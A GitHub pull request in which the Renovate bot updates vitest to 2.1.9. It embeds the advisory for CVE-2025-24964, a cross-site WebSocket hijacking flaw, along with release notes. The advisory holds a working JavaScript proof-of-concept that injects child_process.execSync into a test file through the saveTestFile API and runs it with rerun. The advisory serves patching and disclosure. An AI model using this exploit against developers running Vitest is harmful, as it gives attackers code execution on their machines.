Skip to content

chore(deps): update dependency vitest to v2.1.9 [security]#2

Open
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-vitest-vulnerability
Open

chore(deps): update dependency vitest to v2.1.9 [security]#2
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-vitest-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Apr 7, 2025

Copy link
Copy Markdown

This PR contains the following updates:

Package Change Age Confidence
vitest (source) 2.1.12.1.9 age confidence

Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening

CVE-2025-24964 / GHSA-9crc-q9x8-hgqq

More information

Details

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC
  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})
Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Severity

  • CVSS Score: 9.6 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

vitest-dev/vitest (vitest)

v2.1.9

Compare Source

This release includes security patches for:

   🐞 Bug Fixes
    View changes on GitHub

v2.1.8

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v2.1.7

Compare Source

   🐞 Bug Fixes
  • Revert support for Vite 6  -  by @​sheremet-va (fbe5c)
    • This introduced some breaking changes (#​6992). We will enable support for it later. In the meantime, you can still use pnpm.overrides or yarn resolutions to override the vite version in the vitest package - the APIs are compatible.
    View changes on GitHub

v2.1.6

Compare Source

🚀 Features

  • Support Vite 6
    View changes on GitHub

v2.1.5

Compare Source

   🐞 Bug Fixes
   🏎 Performance
    View changes on GitHub

v2.1.4

Compare Source

   🚀 Features

This patch release includes a non-breaking feature for the experimental Browser Mode that doesn't follow SemVer. If you want to avoid picking up releases like this, make sure to pin the Vitest version in your package.json. See npm's documentation about semver for more information.

   🐞 Bug Fixes
   🏎 Performance
    View changes on GitHub

v2.1.3

Compare Source

   🐞 Bug Fixes
   🏎 Performance
    View changes on GitHub

v2.1.2

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 3add793 to d92bd5c Compare April 11, 2025 16:06
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from d92bd5c to 6b86180 Compare April 27, 2025 00:04
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 3df5956 to 356f6d8 Compare May 31, 2025 16:06
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 356f6d8 to e47d3ee Compare June 6, 2025 17:41
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from e47d3ee to bde9268 Compare June 22, 2025 19:48
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from bde9268 to 0ebffa0 Compare July 5, 2025 04:12
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 6d72268 to 96ea1d3 Compare August 15, 2025 04:14
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 96ea1d3 to ab9fa01 Compare August 23, 2025 15:29
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from ab9fa01 to ff2e182 Compare September 1, 2025 02:04
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from ff2e182 to 8e467f6 Compare September 26, 2025 23:14
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 8e467f6 to b5ae864 Compare October 23, 2025 07:56
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from b5ae864 to 3208bc4 Compare November 15, 2025 11:40
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 3208bc4 to 0cb821f Compare December 4, 2025 22:29
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 0cb821f to f6ec894 Compare January 1, 2026 02:40
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from f6ec894 to a81de13 Compare January 9, 2026 06:54
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from e176099 to 23df3e5 Compare January 24, 2026 06:57
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 23df3e5 to 9ecee91 Compare February 3, 2026 07:27
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 9ecee91 to 88dea58 Compare February 13, 2026 20:12
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 88dea58 to 8ad5112 Compare March 8, 2026 08:58
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 8ad5112 to e83911f Compare April 15, 2026 12:05
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from e83911f to e1e9ca8 Compare April 30, 2026 03:51
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from e1e9ca8 to 56060fc Compare May 13, 2026 04:16
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 56060fc to b5bc669 Compare May 21, 2026 23:40
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from b5bc669 to 8686859 Compare May 29, 2026 04:00
@renovate renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 8686859 to a9c3847 Compare June 5, 2026 04:06
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants